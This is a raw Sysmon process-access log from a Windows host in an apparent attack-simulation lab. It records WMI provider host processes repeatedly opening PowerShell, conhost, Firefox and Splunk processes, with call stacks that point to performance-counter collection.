21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150581Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150580Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150579Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150578Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150577Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150576Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150575Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150574Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150573Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150572Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150571Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150570Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150569Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 10341000x8000000000000000150568Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150567Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.317{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+14a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll+2b65e|C:\Windows\System32\advapi32.dll+14567|C:\Windows\System32\advapi32.dll+127fa|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a 